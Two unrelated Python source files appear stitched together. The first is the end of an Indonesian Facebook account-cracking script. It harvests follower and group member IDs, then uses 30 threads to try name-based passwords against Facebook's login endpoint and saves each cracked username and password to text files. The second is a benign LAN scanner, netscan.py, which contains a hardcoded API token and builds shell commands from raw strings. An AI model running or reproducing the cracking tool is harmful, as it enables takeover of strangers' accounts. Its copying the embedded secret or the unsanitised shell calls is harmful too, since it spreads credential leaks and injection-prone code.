data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos5
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = j['last_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos6
oke = open("done/grup.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} \x1b[1;96mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;96m") + j['name']
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;96m") + zowe
print ("\x1b[1;97m{\x1b[1;96m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;96m") + bos6
cek = open("done/grup.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mSelesai ...'
print"\033[1;97m{\033[1;96m●\033[1;97m} \033[1;96mTotal \033[1;92mOK\033[1;97m/\x1b[1;96mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;96m"+str(len(cekpoint))
print '\033[1;97m{\033[1;96m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;96mCP \033[1;96mfile tersimpan \033[1;91m: \033[1;92mdone/grup.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;96mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### CRACK FOLLOW #####
def crack_follow():
toket=open('login.txt','r').read()
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;95m●●● \033[1;97mCRACK FOLLOWERS \033[1;95m●●●")
print 50* "\033[1;94m─"
idt = raw_input("\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mID Publik/Teman \033[1;91m:\033[1;92m ")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mNama \033[1;91m:\033[1;92m "+op["name"]
except KeyError:
print"\033[1;97m{\033[1;91m!\033[1;97m} ID publik/teman tidak ada !"
raw_input("\n\033[1;95m[\033[1;97m<Kembali>\033[1;95m]")
menu()
except requests.exceptions.ConnectionError:
print"\033[1;97m{\033[1;91m!\033[1;97m} Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=999999&access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
print "\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mTotal ID Followers \033[1;91m:\033[1;92m "+str(len(id))
print('\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print("\n\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mGunakan Mode Pesawat Jika Tidak Ada Hasil")
print ("\033[1;94m──────────────────────────────────────────────────")
##### MAIN FOLLOW #####
def main(arg):
sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos1
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos1
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos2
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos2
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos3
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos3
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = j['last_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos4
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos4
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = j['last_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos5
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = j['last_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos6
oke = open("done/follow.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} \x1b[1;95mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;95m") + j['name']
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;95m") + zowe
print ("\x1b[1;97m{\x1b[1;95m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;95m") + bos6
cek = open("done/follow.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mSelesai ...'
print"\033[1;97m{\033[1;95m●\033[1;97m} \033[1;95mTotal \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;95m"+str(len(cekpoint))
print '\033[1;97m{\033[1;95m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;95mCP \033[1;95mfile tersimpan \033[1;91m: \033[1;92mdone/follow.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;95mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### USERNAME ID ####
def user_id():
os.system('clear')
print logo
print 50* "\033[1;94m─"
ling = ('https://www.facebook.com/')
url = ling+raw_input("\033[1;97m{\033[1;95m×\033[1;97m} Username : ")
idre = re.compile('"entity_id":"([0-9]+)"')
page = requests.get(url)
print idre.findall(page.content)
raw_input("\n\033[1;95m[\033[1;97m<Kembali>\033[1;95m]")
menu()
##### PERBARUI #####
def perbarui():
    # Update the script: pull the latest version from the git remote,
    # wait for the user, then relaunch the main script.
    os.system("clear")
    print logo
    print "\033[1;94m──────────────────────────────────────────────────"
    jalan ("\033[1;92mMemperbarui Script ...\033[1;93m")
    # Requires the working directory to be a git clone of the project.
    os.system("git pull origin master")
    raw_input("\n\033[1;94m{\033[1;97m<Kembali>\033[1;94m}")
    os.system("python2 cr4ck.py")
# Script entry point: show the main menu, then fall through to the login
# handler once menu() returns.
if __name__=='__main__':
    menu()
    masuk()
|
netscan.py | # -*- coding: utf-8 -*-
#!/usr/bin/env python3
# Authors:
# Julio Costella Vicenzi
# Yuri Alves
# Lucas Pittella
import os # cmd line programs
import time # for sleep()
import ipaddress
import requests
import subprocess
import multiprocessing
from datetime import datetime # for scan date
import argparse
import jhistoric
# netscan scans and logs the current connected network
# and warns of new devices or offline devices
# dependencies:
# package iproute2 (linux) for ip
# filters a list of string removing whitespace and empty strings
# filters a list of strings, removing whitespace and empty strings
def filter_strings(string_list):
    """Clean every string in *string_list* and drop entries that end up empty.

    Each entry is passed through filter_string(); entries that become ""
    are removed entirely.  Returns a new list; the input is not modified.

    Bug fix: the previous version used list.remove(""), which deletes at
    most ONE empty string, so inputs producing several empty entries were
    returned with empties left over.
    """
    cleaned = [filter_string(s) for s in string_list]
    return [s for s in cleaned if s != ""]

def filter_string(s):
    """Strip spaces, newlines, tabs, square brackets and single quotes from *s*."""
    s = s.replace(" ", "") \
        .replace("\n", "") \
        .replace("\t", "") \
        .replace("[", "") \
        .replace("]", "") \
        .replace("'", "")
    return s
# a single device in the network. Saves info and current time
class NetworkDevice:
def __init__(self, ip, mac, UP=True, vendor=None):
self.ip = ip
self.mac = mac
self.UP=UP
self.vendor = self.get_api_vendor() if vendor == None else vendor
self.set_router()
self.first_scan_date = datetime.now()
self.snmp_enabled = self.check_snmp_available()
# uses cmd line to check if IP has router flag
def set_router(self):
# check if router flag is UG, else consider device as host
router_flag = filter_string(os.popen("route -n |"
"grep "+str(self.ip)+
"| awk '{print $4}' | head -1")
.read())
self.router = (router_flag == "UG") # if flag is UG, device is router
# uses API to check vendor based on mac addr
def get_api_vendor(self):
url = "https://api.macvendors.com/"
api_key = " \ -H \"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiIsImp0aSI6IjYwNDI4NTNjLWE2ODEtNGJjMC1hYWEwLTQ4NmViNjg4YzY5MyJ9.eyJpc3MiOiJtYWN2ZW5kb3JzIiwiYXVkIjoibWFjdmVuZG9ycyIsImp0aSI6IjYwNDI4NTNjLWE2ODEtNGJjMC1hYWEwLTQ4NmViNjg4YzY5MyIsImlhdCI6MTYwNTg1NDQyMywiZXhwIjoxOTIwMzUwNDIzLCJzdWIiOiI3OTM0IiwidHlwIjoiYWNjZXNzIn0.0QcT4oFqWzDltiFT2TUfindClv4nCANiJoqtoQgf4xJWz1hBMZTqpLeNcpJWo2qmXaMubLkIWtn59-qVMAc98Q\""
try:
response = requests.get(url+self.mac+api_key)
except Exception as e:
print(e)
if response.status_code != 200:
vendor = "Unknown"
else:
vendor = response.content.decode()
return vendor
# checks if the device can be reache by a snmp call
# this only checks for a public string
def check_snmp_available(self):
try:
# this calls raises an exception on fail
subprocess.check_call(['snmpget','-v', '2c', '-c', 'public', str(self.ip), '1'],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
return True
except:
return False
# prints current device state as a warning of changed state
def report_changed_state(self):
print("Device changed to ", "UP" if self.UP else "DOWN" , " !")
self.print()
def print(self):
print("Type: " + ("Router" if self.router else "Host"))
print("IP: " + str(self.ip))
print("MAC: " + self.mac)
print("Vendor: ", self.vendor)
print("State: ", "UP" if self.UP else "DOWN")
print("SNMP: ", "Enabled" if self.snmp_enabled else "Disabled")
print("First scanned at: ", self.first_scan_date.strftime("%d/%m/%Y %H:%M:%S"))
class NetworkScanner:
    """Discovers and tracks devices on the local IP network.

    network_addr must include the subnet mask in the x.x.x.x/m format;
    when it is omitted, the local interface address is used to derive it.
    Results live in memory and are mirrored to discovery_history.json
    through the jhistoric module.
    """

    # network_addr must include subnet mask in the x.x.x.x/m format
    # when argument is default, ip is used to retrieve the subnet mask
    def __init__(self, network_addr=None):
        if(network_addr==None):
            # head -1 used to ensure only a single ip address is retrieved
            network_addr = filter_string(os.popen("ip -o -f inet addr show"
                                                  "| awk \'/scope global/ {print $4}\' "
                                                  "| head -1").read())
        try:
            # get the base network address based on local ip and mask (x.x.x.x/m)
            # strict false makes the constructor calculate the base network ip
            self.network_addr = ipaddress.ip_network(network_addr, strict=False)
        except ValueError:
            print("Invalid network address. Check your internet connection")
            exit()
        # if the discovery history json file does not exist, create an empty one
        if not os.path.exists('discovery_history.json'):
            open('discovery_history.json', 'w+').write('[\n\n]')
        # TODO: open JSON file and read already scanned devices
        self.scanned_devices = []  # list contains history of every device ever scanned
        self.current_scanned_devices = []  # list of current scanned devices
        # network changes from last scan
        self.new_online_devices_count = 0
        self.new_offline_devices_count = 0

    # does a continuous network scan periodically
    # scan_period = number of seconds between each scan
    def periodic_scan(self, scan_period=30):
        """Scan forever, sleeping *scan_period* seconds between rounds and
        reporting how many devices changed state each round."""
        print("Performing periodic network device scan on "+str(self.network_addr)+
              " every "+str(scan_period)+" seconds")
        # continuously scan
        while True:
            self.single_scan()
            # TODO: update log with scanned devices
            if self.new_online_devices_count > 0:
                print(str(self.new_online_devices_count)+" devices are now online!")
            if self.new_offline_devices_count > 0:
                print(str(self.new_offline_devices_count)+" devices are now offline!")
            #self.print_scanned_devices()
            time.sleep(scan_period)

    # ------------ network scan methods ------------------
    # scans the network for available devices
    # updates scanned_devices with new devices and their state
    # updates current_scanned_devices with the devices found
    def single_scan(self):
        """One full scan: ping sweep, MAC resolution, then reconciliation
        of the results against the device lists."""
        print("[--Scanning--]")
        pinged_ips = self.ping_sweep()
        addrs_dict = self.get_macs(pinged_ips)
        self.update_scanned_devices(addrs_dict)
        if not self.current_scanned_devices:
            print("No connected devices found! Check your connection")
        print("[--Scan finished--]")

    # pings every possible ip in the network
    # returns IPs that could be pinged
    def ping_sweep(self):
        """Ping every host address of the network in parallel and return
        the list of addresses (ipaddress objects) that answered.

        NOTE(review): this spawns one worker process per host address,
        which is heavy for large subnets — confirm this is acceptable.
        """
        # ping job used for multiprocessing workers
        def ping_job(job_q, results_q):
            while True:
                ip = job_q.get()
                if ip is None: break  # None is the shutdown sentinel
                try:
                    subprocess.check_call(['ping','-c1',ip],
                                          stdout=subprocess.DEVNULL,
                                          stderr=subprocess.DEVNULL)
                    results_q.put(ip)
                except: pass  # unreachable host: simply omit it from the results
        # Create queues for multiprocess
        jobs,results = multiprocessing.Queue(),multiprocessing.Queue()
        # Create the processes to execute ping_sweep
        pool = [multiprocessing.Process(target=ping_job, args=(jobs,results))
                for _ in self.network_addr.hosts()]
        # Start the processes
        for p in pool: p.start()
        # Queue one ping target per host
        for ip in self.network_addr.hosts():
            jobs.put(str(ip))
        for p in pool: jobs.put(None)
        # Join all
        for p in pool: p.join()
        # convert queue to list and convert to ipaddress.ip_address
        pinged_ips = []
        while not results.empty():
            pinged_ips.append(ipaddress.ip_address(results.get()))
        return pinged_ips

    # call arp on ip and return the corresponding mac address
    def get_mac_by_arp(self, ip):
        """Resolve *ip* to a MAC via the kernel neighbour table.

        Raises ValueError when no entry can be found.
        """
        # get only the first device, since multiple interfaces might be connected
        # to the same device.
        mac = filter_string(str(os.popen("ip neigh show "+str(ip)+" | awk \'{print $5}\' "
                                         "| head -1").read()))
        if mac == "":
            raise ValueError("Could not find MAC addr for IP: "+str(ip)+" via ARP")
        return mac

    # local mac addr cannot be resolved via arp
    def get_local_mac(self, ip):
        """Resolve one of this machine's own IPs to its interface MAC
        (local addresses cannot be resolved via ARP).

        Raises ValueError when the interface or MAC cannot be determined.
        """
        # get the interface associated with the ip
        grep_ip = str(ip) + "/"  # this is necessary for grep
        ip_interface = filter_string(str(os.popen("ip addr show"
                                                  "| grep "+grep_ip+" | awk \'{print $NF}\'").read()))
        # get interface mac
        mac = filter_string(str(os.popen("ip link show "+ip_interface+""
                                         "| awk \'{print $2}\' | tail -n +2").read()))
        if mac == "":
            raise ValueError("Could not find MAC addr for local IP: "+str(ip) + " via ip link")
        return mac

    # returns a dictionary with mac as keys and ip as items
    # TODO: verify macs could actually be retrieved.
    def get_macs(self, pinged_ips):
        """Map MAC address -> ip for every address in *pinged_ips*."""
        addrs_dict = {}
        # local ips mac addr cannot be resolved via arp
        local_ips = self.get_local_ips()
        for ip in pinged_ips:
            mac = self.get_local_mac(ip) if ip in local_ips else self.get_mac_by_arp(ip)
            # add ip mac pair
            addrs_dict[mac] = ip
        return addrs_dict

    def update_scanned_devices(self, addr_dict):
        """Reconcile the scan results in *addr_dict* with the device lists
        and persist the outcome to the JSON history."""
        self.new_offline_devices_count = 0
        self.new_online_devices_count = 0
        # start by checking if any of the devices went offline
        self.remove_offline_devices(addr_dict)
        # addr_dict should now only contain devices
        # that were not online. We first check if they are in scanned_devices
        # if not, they are added to both current_scanned_devices and scanned_devices
        self.add_devices(addr_dict)
        self.update_json()

    # Checks addr_dict and compares with current scanned devices
    # removes devices from list if their mac is not in the addr_dict
    # removes entries from addr_dict if they are found in the current scanned devices
    def remove_offline_devices(self, addr_dict):
        """Drop devices that stopped answering and strip still-online
        devices out of *addr_dict* (mutated in place).

        NOTE(review): elements are removed from the list while it is being
        iterated, which can skip the element following each removal —
        confirm this is intended.
        """
        for dev in self.current_scanned_devices:
            if dev.mac in addr_dict.keys():
                # device is still online, check whether its ip changed
                dict_ip = addr_dict[dev.mac]
                if dict_ip != dev.ip:
                    print("IP on device changed from "+str(dev.ip)+" to "+str(dict_ip)+" !")
                    dev.ip = dict_ip
                    dev.print()
                # delete mac ip pair, since they already exist and are still online
                del addr_dict[dev.mac]
            else:
                # device is now offline
                self.new_offline_devices_count += 1
                dev.UP = False
                dev.report_changed_state()
                self.current_scanned_devices.remove(dev)

    # check self.scanned_devices for ips in pinged_ips
    # to see if any of the offline devices went online
    def add_devices(self, addr_dict):
        """Re-activate previously seen devices found in *addr_dict*, then
        register whatever remains as brand-new devices."""
        for dev in self.scanned_devices:
            if dev.mac in addr_dict.keys():
                # mac already exists in past scanned devices
                # TODO: refactor code duplicated with remove_offline_devices
                dict_ip = addr_dict[dev.mac]
                if dict_ip != dev.ip:
                    print("IP on device changed from "+str(dev.ip)+" to "+str(dict_ip)+" !")
                    dev.ip = dict_ip
                dev.UP = True
                dev.report_changed_state()
                # add device to current scanned devices
                self.current_scanned_devices.append(dev)
                del addr_dict[dev.mac]
        # the remaining devices must be new
        for mac, ip in addr_dict.items():
            self.add_new_device(ip, mac)

    # creates NetworkDevice object from ip and append to lists
    def add_new_device(self, ip, mac):
        """Create a NetworkDevice for *ip*/*mac* and track it in both lists."""
        self.new_online_devices_count += 1
        # checks if mac is in vendor_dict, else pass None as vendor
        dev = NetworkDevice(ip, mac)
        self.scanned_devices.append(dev)
        self.current_scanned_devices.append(dev)
        print("New Device: ")
        dev.print()

    # this must be called every time
    # since one of the machine's interfaces might go offline
    def get_local_ips(self):
        """Return this machine's own addresses as ipaddress objects."""
        local_ips = os.popen('hostname -I').read()
        local_ips = local_ips.split(" ")
        local_ips = filter_strings(local_ips)
        local_ips = [ipaddress.ip_address(ip) for ip in local_ips]
        return local_ips

    # ---------- vendor methods ------------
    # this is only used if reading MACs from file. Not currently in use
    def read_vendor_file(self):
        """Parse MACS.txt into a dict mapping mac -> vendor.

        NOTE(review): the original header said "tab separated file" but the
        code splits on ',' — the file appears to be comma-separated.
        """
        with open("MACS.txt") as f:
            lines = f.readlines()
        vendor_dict = {}
